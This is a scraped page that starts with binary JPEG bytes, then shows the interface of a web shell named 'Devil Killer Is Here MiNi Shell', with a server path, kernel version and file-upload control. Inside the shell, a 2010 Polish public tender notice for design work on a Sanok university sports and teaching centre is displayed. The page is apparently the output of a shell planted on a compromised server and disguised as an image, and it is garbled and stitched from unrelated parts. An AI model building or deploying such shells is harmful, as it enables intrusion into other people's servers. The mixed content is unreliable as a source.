JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100301/44803-N-2010.html

<p class="kh_header"><b>Sanok: Wykonanie  projektu budowlanego zadania pn. 
Przebudowa i rozbudowa kompleksu 
Państwowej Wyższej Szkoły Zawodowej 
im. Jana Grodka w Sanoku 
o centrum sportowo - dydaktyczne</b><br>
<b>Numer ogłoszenia: 44803 - 2010; data zamieszczenia: 01.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Jana Grodka w Sanoku , ul. Mickiewicza 21, 38-500 Sanok, woj. podkarpackie, tel. 013 4655950, 4655966, faks 013 4655959.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz-sanok.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  projektu budowlanego zadania pn. 
Przebudowa i rozbudowa kompleksu 
Państwowej Wyższej Szkoły Zawodowej 
im. Jana Grodka w Sanoku 
o centrum sportowo - dydaktyczne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: wykonanie dokumentacji projektowo-kosztorysowej pn. Przebudowa i rozbudowa kompleksu Państwowej Wyższej Szkoły Zawodowej im. Jana Grodka w Sanoku o centrum sportowo - dydaktyczne

2.Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowo-kosztorysowej:

1)Wykonanie koncepcji architektonicznej (wizualizacje obiektu), w ilości 3 egzemplarzy wraz ze wstępnym kosztorysem oraz kompletną wersją elektroniczną na płycie CD (skan dokumentacji w zapisie PDF, opisy w dokumencie tekstowym DOC) 
2)Wykonanie ekspertyzy geotechnicznej z ustaleniem kategorii geotechnicznej warunków posadowienia, określenie przydatności gruntu rodzimego do zasypywania wykopów i sposobu uzyskania wymaganego wskaźnika zagęszczenia gruntu.
3)Wykonanie mapy do celów projektowych w skali 1:500 uzgodnionej w ZUD UM zgodnie z obowiązującymi przepisami.
4)Rozpoznanie terenowo-prawne gruntów do celów projektowych oraz sąsiednich wraz z uzyskaniem wypisu i wyrysu z rejestru gruntów.
5)Uzyskanie wszelkich opinii, uzgodnień, oświadczeń i decyzji niezbędnych dla uzyskania pozwolenia na budowę.
6)Wystąpienie i uzyskanie warunków technicznych i wytycznych do projektowania niezbędnych do opracowania dokumentacji od odpowiednich jednostek opiniujących.
7)Opracowanie projektu budowlanego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. (Dz. U. Nr 120, poz. 1133) w ilości 5 egzemplarzy oraz projektu wykonawczego wielobranżowego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. Nr 202, poz. 2072) w ilości 5 egzemplarzy wraz z kompletną wersją elektroniczną na płycie CD (skan dokumentacji w zapisie PDF, opisy w dokumencie tekstowym DOC). Dokumentacja elektroniczna winna być odzwierciedleniem dokumentacji projektowej egzemplarza archiwalnego w formie papierowej (egz. z oryginałem uzgodnień, opinii i oświadczeń). Zamawiana ilość opracowań nie uwzględnia egzemplarzy niezbędnych do uzyskania pozwolenia na budowę. Ponadto każdy następny domawiany egzemplarz będzie wykonany odpłatnie w cenie kosztów powielenia. Dokumentacja projektowo-kosztorysowa będzie trwale i czytelnie oznaczona (egzemplarze i tomy) ponadto 4 egzemplarze trwale oprawionych (w tym egzemplarz archiwalny), 1 egzemplarz w sposób umożliwiający wyjmowanie arkuszy.

W skład dokumentacji będą wchodziły między innymi następujące opracowania branżowe:

architektura, wizualizacje obiektu,
konstrukcja,
aranżacja i wyposażenie wnętrz,
wewnętrzna instalacja elektryczna,
wewnętrzna instalacja komputerowa (logiczna kategorii 7 i elektryczna),
wewnętrzna instalacja sanitarna: wod.- kan., c.o., wentylacja,
wewnętrzna instalacja telefoniczna,
instalacja nagłośnienia, projekcji wielkoekranowej, telewizji użytkowej i            obsługi multimedialnej,
wewnętrzna instalacja przeciwpożarowa,
instalacja alarmowa z monitoringiem,
przyłącza zewnętrzne do obiektu,
instalacja odgromowa,
zagospodarowanie terenu (zieleń, parkingi drogi dojazdowe, oświetlenie terenu itd.),
projekt infrastruktury technicznej - oświetlenia, odwodnienia, kanalizacji deszczowej, kanalizacji teletechnicznej, przebudowę istniejącej infrastruktury technicznej w zakresie kanalizacji sanitarnej, deszczowej, wodociągowej ,ciepłowniczej, energetycznej, teletechnicznej, oświetleniowej, likwidacji kolizji z istniejącymi urządzeniami i obiektami,
inwentaryzacji drzew i krzewów przewidzianych do wycinki w wymaganym zakresie,
projekt organizacji ruchu na czas budowy,
informacja dotycząca bezpieczeństwa i ochrony zdrowia,
projekt organizacji robót i zagospodarowania placu budowy,
oraz inne nie wymienione wyżej projekty, których realizacja będzie konieczna z tytułu oddziaływania pośredniego lub bezpośredniego na teren przyległy.
wersja elektroniczna (plik pdf) na płycie CD projektu budowlanego i projektu wykonawczego (wszystkie branże) - 2 kpl.

8)Dokumentacja powinna być zaprojektowana z poszanowaniem wartości krajobrazu i istniejącej szaty roślinnej, a przede wszystkim wartościowego drzewostanu. W przypadku konieczności usunięcia drzew i krzewów uzyskać, odpowiednią decyzję. W ramach rekompensaty dla środowiska wykonać projekt nasadzeń drzew i krzewów na terenie objętym projektowaniem. Miejsce nasadzeń będzie uzależnione od ilości wycinanych drzew. Natomiast koszt usunięcia (karczowania) i nasadzeń należy uwzględnić w kosztach przedsięwzięcia.
9)Wykonanie kosztorysów inwestorskich dla projektów poszczególnych branż zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389), wraz ze zbiorczym zestawieniem kosztów inwestycji - 3 kpl. wraz z wersją elektroniczną na płycie CD (w oryginalnym opracowaniu, w arkuszu kalkulacyjnym lub dokumencie tekstowym oraz skan1 egzemplarza w zapisie PDF). Kosztorysy należy wykonać z podziałem na koszty budowy części sportowej i dydaktycznej z uwzględnieniem etapowania inwestycji. 
10)Wykonanie specyfikacji technicznych wykonania i odbioru robót (wszystkie branże) po 5 kpl. zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. Nr 202, poz. 2072) wraz z wersja elektroniczną na płycie CD (w dokumencie tekstowym oraz skan 1 egzemplarza w zapisie PDF).
11)Wykonanie przedmiarów robót (wszystkie branże) na bazie specyfikacji technicznych wykonania i odbioru robót zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. Nr 202, poz. 2072) - 3 kpl. wraz z wersją elektroniczną na płycie CD (w oryginalnym opracowaniu, w arkuszu kalkulacyjnym lub dokumencie tekstowym oraz skan 1 egzemplarza w zapisie PDF).
12)Opracowanie opisu przedmiotu zamówienia dotyczącego wszystkich branż oraz wyposażenia budynku ( sprzęt sportowy, meble, sprzęt nagłaśniający itp.), niezbędnego do ogłoszenia przetargu na realizację inwestycji oraz odrębnych postępowań na wyposażenie obiektu zgodnie z opracowanym projektem wykonawczym i aranżacją wnętrz - 3 egz. wraz z wersją elektroniczną na płycie CD - 2 kpl.
13)Opracowanie charakterystyki energetycznej budynku - 3 egz.
14)Uzyskanie kompletu uzgodnień i wymaganych pozwoleń niezbędnych do uzyskania decyzji pozwolenia na budowę, wraz z jego uzyskaniem.
15)W przypadku wystąpienia kolizji sieci projektowanych i istniejących, wykonać projekty budowlano-wykonawcze dotyczące ich usunięcia, np. kolizji: energetycznych, gazowych, wodociągowych, itd. (dla kolizji energetycznych opracować odrębną dokumentację techniczną wraz z odrębnym pozwoleniem na budowę - jeżeli to będzie konieczne).

Dokumentacja powinna zostać tak sporządzona, aby było możliwe etapowanie prac
 (w uzgodnieniu z Zamawiającym). Jest to konieczne ze względu na fakt, że Uczelnia może nie posiadać dostatecznej ilości środków na sfinansowanie przedsięwzięcia w jednym etapie.

3.Przedmiot zamówienia obejmuje również pełnienie nadzoru autorskiego.

1)Nadzór autorski który będzie obejmował w szczególności:

stwierdzenie zgodności wykonywanych robót z projektem,
wyjaśnianie (na placu budowy) wszelkich wątpliwości i zastrzeżeń dotyczących rozwiązań przyjętych w projekcie;
proponowanie i uzgadnianie ewentualnych rozwiązań zastępczych z Zamawiającym lub innymi podmiotami działającymi na jego rzecz (Inspektor nadzoru, Wykonawca robót budowlanych) w terminach wskazywanych każdorazowo przez Zamawiającego lub inne podmioty działające na jego rzecz, na piśmie z co najmniej 3-dniowym wyprzedzeniem. 
opracowanie świadectwa energetycznego obiektu - 3 egz. 

2)Wykonawca z realizacji obowiązków wynikających z nadzoru autorskiego zobowiązuje się składać pisemne sprawozdania raz na kwartał  i przekazywać je Zamawiającemu,
3)0 terminie rozpoczęcia i planowanym okresie robót budowlanych Zamawiający powiadamia Wykonawcę pisemnie lub faksem w terminie, co najmniej 7 dni przed terminem rozpoczęcia robót budowlanych. Wykonawca zobowiązuje się uczestniczyć 
w odbiorze robót budowlanych i nanieść zmiany w dokumentacji powykonawczej, jeśli takie wystąpią lub wykonać projekty zamienne w przypadku wprowadzenia zmian istotnych w trakcie realizacji inwestycji oraz uzyskania ostatecznej decyzji zatwierdzającej projekt zamienny,
4)Bieżącej współpracy z Inspektorem Nadzoru i Wykonawcą robót budowlanych przy realizacji przedsięwzięcia, 
5)Wykonania wszelkich zaleceń Zamawiającego, Inspektora Nadzoru i Wykonawcy robót budowlanych mające na celu uzyskanie ostatecznego pozwolenia na użytkowanie inwestycji,

4.Przedmiot zamówienia będzie realizowany w czterech etapach;

I etap - obejmuje wykonanie koncepcji architektonicznej,
II etap - obejmuje projekty budowlane i inne opracowania w zakresie niezbędnym dla uzyskania pozwolenia na budowę, specyfikacje techniczne wykonania i odbioru robót budowlanych, przedmiary robót, kosztorysy inwestorskie,
III etap - obejmuje projekty wykonawcze, informację dotyczącą bezpieczeństwa i ochrony zdrowia, opis przedmiotu zamówienia na realizację przedsięwzięcia, kompletną dokumentację w formie elektronicznej na nośniku CD oraz pozostałe elementy dokumentacji projektowej, nie wymienione do pozwolenia na budowę, a konieczne do wszczęcia procedury przetargowej na roboty budowlane i dostawę wyposażenia oraz prawidłowej realizacji i eksploatacji obiektów,
IV etap - obejmuje nadzór autorski
5.Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 440.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 6 000 PLN. Wadium należy wnosić przed upływem terminu składania ofert w wybranej formie:  

pieniądzu na konto Powszechna Kasa Oszczędności Bank Polski S.A. oddział Centrum w Sanoku 82 1020 2980 0000 2502 0002 9959
            lub	
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że zobowiązanie  kasy jest zawsze zobowiązaniem pieniężnym; 
lub 
gwarancjach bankowych,
            lub
gwarancjach ubezpieczeniowych,
            lub
poręczeniach udzielanych przez podmioty, o których mowa w  art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Dowód wniesienia wadium należy dołączyć do oferty. Jeżeli wadium będzie wnoszone w pieniądzu najpóźniej w dniu składania ofert do godz. 10 00 pieniądze musza znajdować się na koncie zamawiającego. W innym przypadku zamawiający odrzuci ofertę za brak wpłacenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału zostaną uznani Wykonawcy, którzy dołączą oświadczenie że spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych.Sposób dokonywania oceny spełnienia warunków wymaganych od Wykonawców oparty będzie na zasadzie: spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek zostaną uznani Wykonawcy, którzy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, wykonali zamówienia o podobnym charakterze i przeznaczeniu do przedmiotu zamówienia tj. wykonał co najmniej 1 projekt budowlany hali sportowej wielofunkcyjnej o wymiarach areny nie mniejszej niż 44,0 x 24,0 m.
Sposób dokonywania oceny spełnienia warunków wymaganych od Wykonawców oparty będzie na zasadzie: spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału zostaną uznani Wykonawcy, którzy dołączą oświadczenie że spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych.Sposób dokonywania oceny spełnienia warunków wymaganych od Wykonawców oparty będzie na zasadzie: spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału zostaną uznani Wykonawcy, którzy dysponują  osobami  o następujących kwalifikacjach i doświadczeniu:

Projektant w specjalności architektonicznej posiadający :
 - wykształcenie wyższe techniczne, 
- co najmniej 5 letnie doświadczenie zawodowe w projektowaniu w specjalności architektonicznej tj. okres liczony od daty uzyskania uprawnień do projektowania 
w specjalności architektonicznej, do daty składania ofert,
- doświadczenie w pracach zespołu projektowego, który opracował co najmniej jedną dokumentację projektową na budowę obiektu kubaturowego o charakterze sportowym, 
- uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń, 
- aktualny, na dzień składania ofert, wpis na listę członków właściwej Izby samorządu Zawodowego. 
Projektant w specjalności konstrukcyjno-budowlanej posiadający :
- wykształcenie wyższe techniczne, 
- co najmniej 5 letnie doświadczenie zawodowe w projektowaniu w specjalności konstrukcyjno - budowlanej tj. okres liczony od daty uzyskania uprawnień do projektowania w specjalności konstrukcyjno - budowlanej, do daty składania ofert, 
- doświadczenie w pracach zespołu projektowego, który opracował co najmniej jedną dokumentację projektową na budowę obiektu kubaturowego o charakterze sportowym, 
- uprawnienia budowlane do projektowania w specjalności konstrukcyjno -budowlanej bez ograniczeń, 
- aktualny, na dzień składania ofert, wpis na listę członków właściwej Izby samorządu Zawodowego. 
Projektant w specjalności sanitarnej posiadający: 
- wykształcenie wyższe techniczne, 
- co najmniej 5 letnie doświadczenie zawodowe w projektowaniu w specjalności sanitarnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych i wod-kan tj. okres liczony od daty uzyskania uprawnień do projektowania w specjalności sanitarnej w /w zakresie, do daty składania ofert,
- doświadczenie w pracach zespołu projektowego, który opracował co najmniej jedną dokumentację projektową na budowę obiektu kubaturowego o charakterze sportowym, 
- uprawnienia budowlane do projektowania w specjalności sanitarnej w w/w zakresie bez ograniczeń, 
- aktualny, na dzień składania ofert, wpis na listę członków właściwej Izby samorządu Zawodowego. 

Projektant w specjalności elektrycznej posiadający: 
- wykształcenie wyższe techniczne, 
- co najmniej 5 letnie doświadczenie zawodowe w projektowaniu w specjalności elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych tj. okres liczony od daty uzyskania uprawnień do projektowania w specjalności elektrycznej do daty składania ofert,
- doświadczenie w pracach zespołu projektowego, który opracował co najmniej jedną dokumentację projektową na budowę obiektu kubaturowego o charakterze sportowym, 
- uprawnienia budowlane do projektowania w specjalności elektrycznej w w/w zakresie bez ograniczeń, 
- aktualny, na dzień składania ofert, wpis na listę członków właściwej Izby samorządu Zawodowego. 
Projektant w specjalności telekomunikacyjnej posiadający: 
- wykształcenie wyższe techniczne, 
- co najmniej 5 letnie doświadczenie zawodowe w projektowaniu w specjalności telekomunikacyjnej sieci i urządzeń telekomunikacyjnych wraz z infrastrukturą towarzyszącą tj. okres liczony od daty uzyskania uprawnień do projektowania 
w specjalności telekomunikacyjnej do daty składania ofert,
- uprawnienia do projektowania w specjalności telekomunikacyjnej w w/w zakresie, 

Sposób dokonywania oceny spełnienia warunków wymaganych od Wykonawców oparty będzie na zasadzie: spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału zostaną uznani Wykonawcy, którzy dołączą oświadczenie że spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych.Sposób dokonywania oceny spełnienia warunków wymaganych od Wykonawców oparty będzie na zasadzie: spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku prowadzenia działalności gospodarczej w formie spółki cywilnej, wymagane jest dołączenie umowy spółki cywilnej i uchwały, z której wynika jednoznacznie sposób reprezentacji (o ile nie wynika on z umowy) oraz zaświadczeń o wpisie do ewidencji działalności gospodarczej każdego ze wspólników, wystawionych nie wcześniej niż 6 miesięcy przed terminem otwarcia ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 93</li>
<li>2 - Termin wykonania II etapu - 5</li>
<li>3 - Termin wykonania III etapu - 2</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zastrzega sobie możliwość istotnych zmian postanowień zawartej umowy w sytuacji obiektywnej konieczności wprowadzenia zmiany, w niżej przedstawionym zakresie, z zastrzeżeniem art. 140 ust. 1 i 3 ustawy Pzp, w przypadku: 
a)zmiany w obowiązujących przepisach prawa mające wpływ na przedmiot i warunki umowy oraz zmiana sytuacji prawnej lub faktycznej Wykonawcy i lub Zamawiającego skutkująca niemożnością realizacji przedmiotu umowy; 
